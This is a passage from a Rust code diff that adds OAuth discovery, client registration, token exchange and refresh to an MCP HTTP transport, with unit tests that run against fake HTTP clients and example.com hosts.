+ "code_challenge_methods_supported": ["S256"]
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let issuer = Url::parse("https://auth.example.com").unwrap();
+ let result = fetch_auth_server_metadata(&client, &issuer).await;
+
+ assert!(result.is_err());
+ let err_msg = result.unwrap_err().to_string();
+ assert!(
+ err_msg.contains("issuer mismatch"),
+ "unexpected error: {}",
+ err_msg
+ );
+ });
+ }
+
+ // -- Full discover integration tests -------------------------------------
+
+ #[test]
+ fn test_full_discover_with_cimd() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains("oauth-protected-resource") {
+ json_response(
+ 200,
+ r#"{
+ "resource": "https://mcp.example.com",
+ "authorization_servers": ["https://auth.example.com"],
+ "scopes_supported": ["mcp:read"]
+ }"#,
+ )
+ } else if uri.contains("oauth-authorization-server") {
+ json_response(
+ 200,
+ r#"{
+ "issuer": "https://auth.example.com",
+ "authorization_endpoint": "https://auth.example.com/authorize",
+ "token_endpoint": "https://auth.example.com/token",
+ "code_challenge_methods_supported": ["S256"],
+ "client_id_metadata_document_supported": true
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let server_url = Url::parse("https://mcp.example.com").unwrap();
+ let www_auth = WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+
+ let discovery = discover(&client, &server_url, &www_auth).await.unwrap();
+ let registration =
+ resolve_client_registration(&client, &discovery, "http://127.0.0.1:12345/callback")
+ .await
+ .unwrap();
+
+ assert_eq!(registration.client_id, CIMD_URL);
+ assert_eq!(registration.client_secret, None);
+ assert_eq!(discovery.scopes, vec!["mcp:read"]);
+ });
+ }
+
+ #[test]
+ fn test_full_discover_with_dcr_fallback() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains("oauth-protected-resource") {
+ json_response(
+ 200,
+ r#"{
+ "resource": "https://mcp.example.com",
+ "authorization_servers": ["https://auth.example.com"]
+ }"#,
+ )
+ } else if uri.contains("oauth-authorization-server") {
+ json_response(
+ 200,
+ r#"{
+ "issuer": "https://auth.example.com",
+ "authorization_endpoint": "https://auth.example.com/authorize",
+ "token_endpoint": "https://auth.example.com/token",
+ "registration_endpoint": "https://auth.example.com/register",
+ "code_challenge_methods_supported": ["S256"],
+ "client_id_metadata_document_supported": false
+ }"#,
+ )
+ } else if uri.contains("/register") {
+ json_response(
+ 201,
+ r#"{
+ "client_id": "dcr-minted-id-123",
+ "client_secret": "dcr-secret-456"
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let server_url = Url::parse("https://mcp.example.com").unwrap();
+ let www_auth = WwwAuthenticate {
+ resource_metadata: None,
+ scope: Some(vec!["files:read".into()]),
+ error: None,
+ error_description: None,
+ };
+
+ let discovery = discover(&client, &server_url, &www_auth).await.unwrap();
+ let registration =
+ resolve_client_registration(&client, &discovery, "http://127.0.0.1:9999/callback")
+ .await
+ .unwrap();
+
+ assert_eq!(registration.client_id, "dcr-minted-id-123");
+ assert_eq!(
+ registration.client_secret.as_deref(),
+ Some("dcr-secret-456")
+ );
+ assert_eq!(discovery.scopes, vec!["files:read"]);
+ });
+ }
+
+ #[test]
+ fn test_discover_fails_without_pkce_support() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains("oauth-protected-resource") {
+ json_response(
+ 200,
+ r#"{
+ "resource": "https://mcp.example.com",
+ "authorization_servers": ["https://auth.example.com"]
+ }"#,
+ )
+ } else if uri.contains("oauth-authorization-server") {
+ json_response(
+ 200,
+ r#"{
+ "issuer": "https://auth.example.com",
+ "authorization_endpoint": "https://auth.example.com/authorize",
+ "token_endpoint": "https://auth.example.com/token"
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let server_url = Url::parse("https://mcp.example.com").unwrap();
+ let www_auth = WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+
+ let result = discover(&client, &server_url, &www_auth).await;
+ assert!(result.is_err());
+ let err_msg = result.unwrap_err().to_string();
+ assert!(
+ err_msg.contains("code_challenge_methods_supported"),
+ "unexpected error: {}",
+ err_msg
+ );
+ });
+ }
+
+ // -- Token exchange integration tests ------------------------------------
+
+ #[test]
+ fn test_exchange_code_success() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains("/token") {
+ json_response(
+ 200,
+ r#"{
+ "access_token": "new_access_token",
+ "refresh_token": "new_refresh_token",
+ "expires_in": 3600,
+ "token_type": "Bearer"
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let metadata = AuthServerMetadata {
+ issuer: Url::parse("https://auth.example.com").unwrap(),
+ authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ registration_endpoint: None,
+ scopes_supported: None,
+ code_challenge_methods_supported: Some(vec!["S256".into()]),
+ client_id_metadata_document_supported: true,
+ };
+
+ let tokens = exchange_code(
+ &client,
+ &metadata,
+ "auth_code_123",
+ CIMD_URL,
+ "http://127.0.0.1:9999/callback",
+ "verifier_abc",
+ "https://mcp.example.com",
+ )
+ .await
+ .unwrap();
+
+ assert_eq!(tokens.access_token, "new_access_token");
+ assert_eq!(tokens.refresh_token.as_deref(), Some("new_refresh_token"));
+ assert!(tokens.expires_at.is_some());
+ });
+ }
+
+ #[test]
+ fn test_refresh_tokens_success() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains("/token") {
+ json_response(
+ 200,
+ r#"{
+ "access_token": "refreshed_token",
+ "expires_in": 1800,
+ "token_type": "Bearer"
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let token_endpoint = Url::parse("https://auth.example.com/token").unwrap();
+
+ let tokens = refresh_tokens(
+ &client,
+ &token_endpoint,
+ "old_refresh_token",
+ CIMD_URL,
+ "https://mcp.example.com",
+ )
+ .await
+ .unwrap();
+
+ assert_eq!(tokens.access_token, "refreshed_token");
+ assert_eq!(tokens.refresh_token, None);
+ assert!(tokens.expires_at.is_some());
+ });
+ }
+
+ #[test]
+ fn test_exchange_code_failure() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async move { json_response(400, r#"{"error": "invalid_grant"}"#) })
+ });
+
+ let metadata = AuthServerMetadata {
+ issuer: Url::parse("https://auth.example.com").unwrap(),
+ authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ registration_endpoint: None,
+ scopes_supported: None,
+ code_challenge_methods_supported: Some(vec!["S256".into()]),
+ client_id_metadata_document_supported: true,
+ };
+
+ let result = exchange_code(
+ &client,
+ &metadata,
+ "bad_code",
+ "client",
+ "http://127.0.0.1:1/callback",
+ "verifier",
+ "https://mcp.example.com",
+ )
+ .await;
+
+ assert!(result.is_err());
+ assert!(result.unwrap_err().to_string().contains("400"));
+ });
+ }
+
+ // -- DCR integration tests -----------------------------------------------
+
+ #[test]
+ fn test_perform_dcr() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async move {
+ json_response(
+ 201,
+ r#"{
+ "client_id": "dynamic-client-001",
+ "client_secret": "dynamic-secret-001"
+ }"#,
+ )
+ })
+ });
+
+ let endpoint = Url::parse("https://auth.example.com/register").unwrap();
+ let registration = perform_dcr(&client, &endpoint, "http://127.0.0.1:9999/callback")
+ .await
+ .unwrap();
+
+ assert_eq!(registration.client_id, "dynamic-client-001");
+ assert_eq!(
+ registration.client_secret.as_deref(),
+ Some("dynamic-secret-001")
+ );
+ });
+ }
+
+ #[test]
+ fn test_perform_dcr_failure() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(
+ async move { json_response(403, r#"{"error": "registration_not_allowed"}"#) },
+ )
+ });
+
+ let endpoint = Url::parse("https://auth.example.com/register").unwrap();
+ let result = perform_dcr(&client, &endpoint, "http://127.0.0.1:9999/callback").await;
+
+ assert!(result.is_err());
+ assert!(result.unwrap_err().to_string().contains("403"));
+ });
+ }
+
+ // -- OAuthCallback parse tests -------------------------------------------
+
+ #[test]
+ fn test_oauth_callback_parse_query() {
+ let callback = OAuthCallback::parse_query("code=test_auth_code&state=test_state").unwrap();
+ assert_eq!(callback.code, "test_auth_code");
+ assert_eq!(callback.state, "test_state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_reversed_order() {
+ let callback = OAuthCallback::parse_query("state=test_state&code=test_auth_code").unwrap();
+ assert_eq!(callback.code, "test_auth_code");
+ assert_eq!(callback.state, "test_state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_with_extra_params() {
+ let callback =
+ OAuthCallback::parse_query("code=test_auth_code&state=test_state&extra=ignored")
+ .unwrap();
+ assert_eq!(callback.code, "test_auth_code");
+ assert_eq!(callback.state, "test_state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_missing_code() {
+ let result = OAuthCallback::parse_query("state=test_state");
+ assert!(result.is_err());
+ assert!(result.unwrap_err().to_string().contains("code"));
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_missing_state() {
+ let result = OAuthCallback::parse_query("code=test_auth_code");
+ assert!(result.is_err());
+ assert!(result.unwrap_err().to_string().contains("state"));
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_empty_code() {
+ let result = OAuthCallback::parse_query("code=&state=test_state");
+ assert!(result.is_err());
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_empty_state() {
+ let result = OAuthCallback::parse_query("code=test_auth_code&state=");
+ assert!(result.is_err());
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_url_encoded_values() {
+ let callback = OAuthCallback::parse_query("code=abc%20def&state=test%3Dstate").unwrap();
+ assert_eq!(callback.code, "abc def");
+ assert_eq!(callback.state, "test=state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_error_response() {
+ let result = OAuthCallback::parse_query(
+ "error=access_denied&error_description=User%20denied%20access&state=abc",
+ );
+ assert!(result.is_err());
+ let err_msg = result.unwrap_err().to_string();
+ assert!(
+ err_msg.contains("access_denied"),
+ "unexpected error: {}",
+ err_msg
+ );
+ assert!(
+ err_msg.contains("User denied access"),
+ "unexpected error: {}",
+ err_msg
+ );
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_error_without_description() {
+ let result = OAuthCallback::parse_query("error=server_error&state=abc");
+ assert!(result.is_err());
+ let err_msg = result.unwrap_err().to_string();
+ assert!(
+ err_msg.contains("server_error"),
+ "unexpected error: {}",
+ err_msg
+ );
+ assert!(
+ err_msg.contains("no description"),
+ "unexpected error: {}",
+ err_msg
+ );
+ }
+
+ // -- McpOAuthTokenProvider tests -----------------------------------------
+
+ fn make_test_session(
+ access_token: &str,
+ refresh_token: Option<&str>,
+ expires_at: Option<SystemTime>,
+ ) -> OAuthSession {
+ OAuthSession {
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ resource: Url::parse("https://mcp.example.com").unwrap(),
+ client_registration: OAuthClientRegistration {
+ client_id: "test-client".into(),
+ client_secret: None,
+ },
+ tokens: OAuthTokens {
+ access_token: access_token.into(),
+ refresh_token: refresh_token.map(String::from),
+ expires_at,
+ },
+ }
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_returns_none_when_token_expired() {
+ let expired = SystemTime::now() - Duration::from_secs(60);
+ let session = make_test_session("stale-token", Some("rt"), Some(expired));
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| Box::pin(async { unreachable!() })),
+ None,
+ );
+
+ assert_eq!(provider.access_token(), None);
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_returns_token_when_not_expired() {
+ let far_future = SystemTime::now() + Duration::from_secs(3600);
+ let session = make_test_session("valid-token", Some("rt"), Some(far_future));
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| Box::pin(async { unreachable!() })),
+ None,
+ );
+
+ assert_eq!(provider.access_token().as_deref(), Some("valid-token"));
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_returns_token_when_no_expiry() {
+ let session = make_test_session("no-expiry-token", Some("rt"), None);
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| Box::pin(async { unreachable!() })),
+ None,
+ );
+
+ assert_eq!(provider.access_token().as_deref(), Some("no-expiry-token"));
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_without_refresh_token_returns_false() {
+ smol::block_on(async {
+ let session = make_test_session("token", None, None);
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| {
+ Box::pin(async { unreachable!("no HTTP call expected") })
+ }),
+ None,
+ );
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(!refreshed);
+ });
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_updates_session_and_notifies_channel() {
+ smol::block_on(async {
+ let session = make_test_session("old-access", Some("my-refresh-token"), None);
+ let (tx, mut rx) = futures::channel::mpsc::unbounded();
+
+ let http_client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ json_response(
+ 200,
+ r#"{
+ "access_token": "new-access",
+ "refresh_token": "new-refresh",
+ "expires_in": 1800
+ }"#,
+ )
+ })
+ });
+
+ let provider = McpOAuthTokenProvider::new(session, http_client, Some(tx));
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(refreshed);
+ assert_eq!(provider.access_token().as_deref(), Some("new-access"));
+
+ let notified_session = rx
+ .try_next()
+ .unwrap()
+ .expect("channel should have a session");
+ assert_eq!(notified_session.tokens.access_token, "new-access");
+ assert_eq!(
+ notified_session.tokens.refresh_token.as_deref(),
+ Some("new-refresh")
+ );
+ });
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_preserves_old_refresh_token_when_server_omits_it() {
+ smol::block_on(async {
+ let session = make_test_session("old-access", Some("original-refresh"), None);
+ let (tx, mut rx) = futures::channel::mpsc::unbounded();
+
+ let http_client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ json_response(
+ 200,
+ r#"{
+ "access_token": "new-access",
+ "expires_in": 900
+ }"#,
+ )
+ })
+ });
+
+ let provider = McpOAuthTokenProvider::new(session, http_client, Some(tx));
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(refreshed);
+
+ let notified_session = rx
+ .try_next()
+ .unwrap()
+ .expect("channel should have a session");
+ assert_eq!(notified_session.tokens.access_token, "new-access");
+ assert_eq!(
+ notified_session.tokens.refresh_token.as_deref(),
+ Some("original-refresh"),
+ );
+ });
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_returns_false_on_http_error() {
+ smol::block_on(async {
+ let session = make_test_session("old-access", Some("my-refresh"), None);
+
+ let http_client = make_fake_http_client(|_req| {
+ Box::pin(async { json_response(401, r#"{"error": "invalid_grant"}"#) })
+ });
+
+ let provider = McpOAuthTokenProvider::new(session, http_client, None);
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(!refreshed);
+ // The old token should still be in place.
+ assert_eq!(provider.access_token().as_deref(), Some("old-access"));
+ });
+ }
+}
@@ -8,8 +8,30 @@ use parking_lot::Mutex as SyncMutex;
use smol::channel;
use std::{pin::Pin, sync::Arc};
+use crate::oauth::{self, OAuthTokenProvider, WwwAuthenticate};
use crate::transport::Transport;
+/// Typed errors returned by the HTTP transport that callers can downcast from
+/// `anyhow::Error` to handle specific failure modes.
+#[derive(Debug)]
+pub enum TransportError {
+ /// The server returned 401 and token refresh either wasn't possible or
+ /// failed. The caller should initiate the OAuth authorization flow.
+ AuthRequired { www_authenticate: WwwAuthenticate },
+}
+
+impl std::fmt::Display for TransportError {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ match self {
+ TransportError::AuthRequired { .. } => {
+ write!(f, "OAuth authorization required")
+ }
+ }
+ }
+}
+
+impl std::error::Error for TransportError {}
+
// Constants from MCP spec
const HEADER_SESSION_ID: &str = "Mcp-Session-Id";
const EVENT_STREAM_MIME_TYPE: &str = "text/event-stream";
@@ -25,8 +47,11 @@ pub struct HttpTransport {
response_rx: channel::Receiver<String>,
error_tx: channel::Sender<String>,
error_rx: channel::Receiver<String>,
- // Authentication headers to include in requests
+ /// Static headers to include in every request (e.g. from server config).
headers: HashMap<String, String>,
+ /// When set, the transport attaches `Authorization: Bearer` headers and
+ /// handles 401 responses with token refresh + retry.
+ token_provider: Option<Arc<dyn OAuthTokenProvider>>,
}
impl HttpTransport {
@@ -35,6 +60,16 @@ impl HttpTransport {
endpoint: String,
headers: HashMap<String, String>,
executor: BackgroundExecutor,
+ ) -> Self {
+ Self::new_with_token_provider(http_client, endpoint, headers, executor, None)
+ }
+
+ pub fn new_with_token_provider(
+ http_client: Arc<dyn HttpClient>,
+ endpoint: String,
+ headers: HashMap<String, String>,
+ executor: BackgroundExecutor,
+ token_provider: Option<Arc<dyn OAuthTokenProvider>>,
) -> Self {
let (response_tx, response_rx) = channel::unbounded();
let (error_tx, error_rx) = channel::unbounded();
@@ -49,14 +84,14 @@ impl HttpTransport {
error_tx,
error_rx,
headers,
+ token_provider,
}
}
- /// Send a message and handle the response based on content type
- async fn send_message(&self, message: String) -> Result<()> {
- let is_notification =
- !message.contains("\"id\":") || message.contains("notifications/initialized");
-
+ /// Build a POST request for the given message body, attaching all standard
+ /// headers (content-type, accept, session ID, static headers, and bearer
+ /// token if available).
+ fn build_request(&self, message: &[u8]) -> Result<http_client::Request<AsyncBody>> {
let mut request_builder = Request::builder()
.method(Method::POST)
.uri(&self.endpoint)
@@ -70,15 +105,71 @@ impl HttpTransport {
request_builder = request_builder.header(key.as_str(), value.as_str());
}
- // Add session ID if we have one (except for initialize)
+ // Attach bearer token when a token provider is present.
+ if let Some(token) = self.token_provider.as_ref().and_then(|p| p.access_token()) {
+ request_builder = request_builder.header("Authorization", format!("Bearer {}", token));
+ }
+
+ // Add session ID if we have one (except for initialize).
if let Some(ref session_id) = *self.session_id.lock() {
request_builder = request_builder.header(HEADER_SESSION_ID, session_id.as_str());
}
- let request = request_builder.body(AsyncBody::from(message.into_bytes()))?;
+ Ok(request_builder.body(AsyncBody::from(message.to_vec()))?)
+ }
+
+ /// Send a message and handle the response based on content type.
+ async fn send_message(&self, message: String) -> Result<()> {
+ let is_notification =
+ !message.contains("\"id\":") || message.contains("notifications/initialized");
+
+ // If we currently have no access token, try refreshing before sending
+ // the request so restored but expired sessions do not need an initial
+ // 401 round-trip before they can recover.
+ if let Some(ref provider) = self.token_provider {
+ if provider.access_token().is_none() {
+ provider.try_refresh().await.unwrap_or(false);
+ }
+ }
+
+ let request = self.build_request(message.as_bytes())?;
let mut response = self.http_client.send(request).await?;
- // Handle different response types based on status and content-type
+ // On 401, try refreshing the token and retry once.
+ if response.status().as_u16() == 401 {
+ let www_auth_header = response
+ .headers()
+ .get("www-authenticate")
+ .and_then(|v| v.to_str().ok())
+ .unwrap_or("Bearer");
+
+ let www_authenticate =
+ oauth::parse_www_authenticate(www_auth_header).unwrap_or(WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ });
+
+ if let Some(ref provider) = self.token_provider {
+ if provider.try_refresh().await.unwrap_or(false) {
+ // Retry with the refreshed token.
+ let retry_request = self.build_request(message.as_bytes())?;
+ response = self.http_client.send(retry_request).await?;
+
+ // If still 401 after refresh, give up.
+ if response.status().as_u16() == 401 {
+ return Err(TransportError::AuthRequired { www_authenticate }.into());
+ }
+ } else {
+ return Err(TransportError::AuthRequired { www_authenticate }.into());
+ }
+ } else {
+ return Err(TransportError::AuthRequired { www_authenticate }.into());
+ }
+ }
+
+ // Handle different response types based on status and content-type.
match response.status() {
status if status.is_success() => {
// Check content type
@@ -233,6 +324,7 @@ impl Drop for HttpTransport {
let endpoint = self.endpoint.clone();
let session_id = self.session_id.lock().clone();
let headers = self.headers.clone();
+ let access_token = self.token_provider.as_ref().and_then(|p| p.access_token());
if let Some(session_id) = session_id {
self.executor
@@ -242,11 +334,17 @@ impl Drop for HttpTransport {
.uri(&endpoint)
.header(HEADER_SESSION_ID, &session_id);
- // Add authentication headers if present
+ // Add static authentication headers.
for (key, value) in headers {
request_builder = request_builder.header(key.as_str(), value.as_str());
}
+ // Attach bearer token if available.
+ if let Some(token) = access_token {
+ request_builder =
+ request_builder.header("Authorization", format!("Bearer {}", token));
+ }
+
let request = request_builder.body(AsyncBody::empty());
if let Ok(request) = request {
@@ -257,3 +355,402 @@ impl Drop for HttpTransport {
}
}
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use async_trait::async_trait;
+ use gpui::TestAppContext;
+ use parking_lot::Mutex as SyncMutex;
+ use std::sync::atomic::{AtomicBool, AtomicUsize, Ordering};
+
+ /// A mock token provider that returns a configurable token and tracks
+ /// refresh attempts.
+ struct FakeTokenProvider {
+ token: SyncMutex<Option<String>>,
+ refreshed_token: SyncMutex<Option<String>>,
+ refresh_succeeds: AtomicBool,
+ refresh_count: AtomicUsize,
+ }
+
+ impl FakeTokenProvider {
+ fn new(token: Option<&str>, refresh_succeeds: bool) -> Arc<Self> {
+ Self::with_refreshed_token(token, None, refresh_succeeds)
+ }
+
+ fn with_refreshed_token(
+ token: Option<&str>,
+ refreshed_token: Option<&str>,
+ refresh_succeeds: bool,
+ ) -> Arc<Self> {
+ Arc::new(Self {
+ token: SyncMutex::new(token.map(String::from)),
+ refreshed_token: SyncMutex::new(refreshed_token.map(String::from)),
+ refresh_succeeds: AtomicBool::new(refresh_succeeds),
+ refresh_count: AtomicUsize::new(0),
+ })
+ }
+
+ fn set_token(&self, token: &str) {
+ *self.token.lock() = Some(token.to_string());
+ }
+
+ fn refresh_count(&self) -> usize {
+ self.refresh_count.load(Ordering::SeqCst)
+ }
+ }
+
+ #[async_trait]
+ impl OAuthTokenProvider for FakeTokenProvider {
+ fn access_token(&self) -> Option<String> {
+ self.token.lock().clone()
+ }
+
+ async fn try_refresh(&self) -> Result<bool> {
+ self.refresh_count.fetch_add(1, Ordering::SeqCst);
+
+ let refresh_succeeds = self.refresh_succeeds.load(Ordering::SeqCst);
+ if refresh_succeeds {
+ if let Some(token) = self.refreshed_token.lock().clone() {
+ *self.token.lock() = Some(token);
+ }
+ }
+
+ Ok(refresh_succeeds)
+ }
+ }
+
+ fn make_fake_http_client(
+ handler: impl Fn(
+ http_client::Request<AsyncBody>,
+ ) -> std::pin::Pin<
+ Box<dyn std::future::Future<Output = anyhow::Result<Response<AsyncBody>>> + Send>,
+ > + Send
+ + Sync
+ + 'static,
+ ) -> Arc<dyn HttpClient> {
+ http_client::FakeHttpClient::create(handler) as Arc<dyn HttpClient>
+ }
+
+ fn json_response(status: u16, body: &str) -> anyhow::Result<Response<AsyncBody>> {
+ Ok(Response::builder()
+ .status(status)
+ .header("Content-Type", "application/json")
+ .body(AsyncBody::from(body.as_bytes().to_vec()))
+ .unwrap())
+ }
+
+ #[gpui::test]
+ async fn test_bearer_token_attached_to_requests(cx: &mut TestAppContext) {
+ // Capture the Authorization header from the request.
+ let captured_auth = Arc::new(SyncMutex::new(None::<String>));
+ let captured_auth_clone = captured_auth.clone();
+
+ let client = make_fake_http_client(move |req| {
+ let auth = req
+ .headers()
+ .get("Authorization")
+ .map(|v| v.to_str().unwrap().to_string());
+ *captured_auth_clone.lock() = auth;
+ Box::pin(async { json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#) })
+ });
+
+ let provider = FakeTokenProvider::new(Some("test-access-token"), false);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed");
+
+ assert_eq!(
+ captured_auth.lock().as_deref(),
+ Some("Bearer test-access-token"),
+ );
+ }
+
+ #[gpui::test]
+ async fn test_no_bearer_token_without_provider(cx: &mut TestAppContext) {
+ let captured_auth = Arc::new(SyncMutex::new(None::<String>));
+ let captured_auth_clone = captured_auth.clone();
+
+ let client = make_fake_http_client(move |req| {
+ let auth = req
+ .headers()
+ .get("Authorization")
+ .map(|v| v.to_str().unwrap().to_string());
+ *captured_auth_clone.lock() = auth;
+ Box::pin(async { json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#) })
+ });
+
+ let transport = HttpTransport::new(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed");
+
+ assert!(captured_auth.lock().is_none());
+ }
+
+ #[gpui::test]
+ async fn test_missing_token_triggers_refresh_before_first_request(cx: &mut TestAppContext) {
+ let captured_auth = Arc::new(SyncMutex::new(None::<String>));
+ let captured_auth_clone = captured_auth.clone();
+
+ let client = make_fake_http_client(move |req| {
+ let auth = req
+ .headers()
+ .get("Authorization")
+ .map(|v| v.to_str().unwrap().to_string());
+ *captured_auth_clone.lock() = auth;
+ Box::pin(async { json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#) })
+ });
+
+ let provider = FakeTokenProvider::with_refreshed_token(None, Some("refreshed-token"), true);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed after proactive refresh");
+
+ assert_eq!(provider.refresh_count(), 1);
+ assert_eq!(
+ captured_auth.lock().as_deref(),
+ Some("Bearer refreshed-token"),
+ );
+ }
+
+ #[gpui::test]
+ async fn test_invalid_token_still_triggers_refresh_and_retry(cx: &mut TestAppContext) {
+ let request_count = Arc::new(AtomicUsize::new(0));
+ let request_count_clone = request_count.clone();
+
+ let client = make_fake_http_client(move |_req| {
+ let count = request_count_clone.fetch_add(1, Ordering::SeqCst);
+ Box::pin(async move {
+ if count == 0 {
+ Ok(Response::builder()
+ .status(401)
+ .header(
+ "WWW-Authenticate",
+ r#"Bearer error="invalid_token", resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource""#,
+ )
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ } else {
+ json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#)
+ }
+ })
+ });
+
+ let provider = FakeTokenProvider::with_refreshed_token(
+ Some("old-token"),
+ Some("refreshed-token"),
+ true,
+ );
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed after refresh");
+
+ assert_eq!(provider.refresh_count(), 1);
+ assert_eq!(request_count.load(Ordering::SeqCst), 2);
+ }
+
+ #[gpui::test]
+ async fn test_401_triggers_refresh_and_retry(cx: &mut TestAppContext) {
+ let request_count = Arc::new(AtomicUsize::new(0));
+ let request_count_clone = request_count.clone();
+
+ let client = make_fake_http_client(move |_req| {
+ let count = request_count_clone.fetch_add(1, Ordering::SeqCst);
+ Box::pin(async move {
+ if count == 0 {
+ // First request: 401.
+ Ok(Response::builder()
+ .status(401)
+ .header(
+ "WWW-Authenticate",
+ r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource""#,
+ )
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ } else {
+ // Retry after refresh: 200.
+ json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#)
+ }
+ })
+ });
+
+ let provider = FakeTokenProvider::new(Some("old-token"), true);
+ // Simulate the refresh updating the token.
+ let provider_ref = provider.clone();
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ // Set the new token that will be used on retry.
+ provider_ref.set_token("refreshed-token");
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed after refresh");
+
+ assert_eq!(provider_ref.refresh_count(), 1);
+ assert_eq!(request_count.load(Ordering::SeqCst), 2);
+ }
+
+ #[gpui::test]
+ async fn test_401_returns_auth_required_when_refresh_fails(cx: &mut TestAppContext) {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ Ok(Response::builder()
+ .status(401)
+ .header(
+ "WWW-Authenticate",
+ r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource", scope="read write""#,
+ )
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ })
+ });
+
+ // Refresh returns false — no new token available.
+ let provider = FakeTokenProvider::new(Some("stale-token"), false);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
